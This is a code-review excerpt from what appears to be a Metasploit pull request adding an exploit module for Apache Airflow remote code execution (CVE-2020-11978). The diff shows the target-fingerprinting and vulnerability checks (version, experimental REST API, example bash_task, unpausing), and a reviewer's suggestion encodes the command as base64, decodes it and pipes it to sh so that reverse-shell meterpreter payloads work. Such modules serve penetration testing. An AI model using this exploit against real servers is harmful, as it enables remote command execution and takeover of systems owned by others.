modules/exploits/multi/http/apache_airflow_dag_rce.rb

```diff
@@ -0,0 +1,270 @@
+    end
+
+    unless res.code == 200 &&
+           res.body.downcase.include?('admin') &&
+           res.body.downcase.include?('_csrf_token') &&
+           res.body.downcase.include?('sign in to airflow')
+      return CheckCode::Unknown('Target is not running Apache Airflow.')
+    end
+
+    vprint_good('Target is running Apache Airflow.')
+
+    vprint_status('Checking Apache Airflow version...')
+    version_number = res.body.to_s.scan(
+      %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}
+    ).flatten.first
+
+    unless version_number
+      return CheckCode::Detected('Apache Airflow version cannot be determined.')
+    end
+
+    unless Rex::Version.new(version_number) < Rex::Version.new('1.10.11')
+      return CheckCode::Safe
+    end
+
+    print_status(
+      "Target is running Apache Airflow Version #{version_number}. " \
+      'Performing additional checks for exploitability...'
+    )
+
+    check_api
+    check_task
+    check_unpaused
+
+    return CheckCode::Appears
+  end
+
+  def check_api
+    uri = normalize_uri(target_uri.path, 'api', 'experimental', 'test')
+    vprint_status("Checking if Airflow Experimental REST API is accessible at: #{full_uri(uri)}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res && res.code == 200
+      return CheckCode::Safe('Could not access the Airflow Experimental REST API.')
+    end
+
+    print_good('Airflow Experimental REST API is accessible.')
+  end
+
+  def check_task
+    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'tasks', 'bash_task')
+    vprint_status('Checking for vulnerability of "example_trigger_target_dag.bash_task"...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res && res.code == 200
+      return CheckCode::Safe(
+        'Could not find "example_trigger_target_dag.bash_task". ' \
+        'Target is not vulnerable to CVE-2020-11978.'
+      )
+    end
+
+    if res.get_json_document['env'].include?('dag_run')
+      return CheckCode::Safe(
+        'The "example_trigger_target_dag.bash_task" is patched. ' \
+        'Target is not vulnerable to CVE-2020-11978.'
+      )
+    end
+
+    print_good('The "example_trigger_target_dag.bash_task" is vulnerable.')
+  end
+
+  def check_unpaused
+    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'paused', 'false')
+    vprint_status('Checking if "example_trigger_target_dag.bash_task" can be unpaused...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri
+    })
+
+    unless res && res.code == 200
+      return CheckCode::Safe(
+        'Could not unpause "example_trigger_target_dag.bash_task". ' \
+        'Example DAGs were not loaded.'
+      )
+    end
+
+    print_good('The "example_trigger_target_dag.bash_task" is unpaused.')
+  end
+
+  def create_dag(cmd)
+    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'dag_runs')
```

Comment:
```suggestion
    cmd = "echo #{Base64.strict_encode64(cmd)} | base64 -d | sh"
    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'dag_runs')
```
This will make the fetch command payloads like `cmd/linux/http/x64/meterpreter_reverse_tcp` work, and it will not break the other payloads.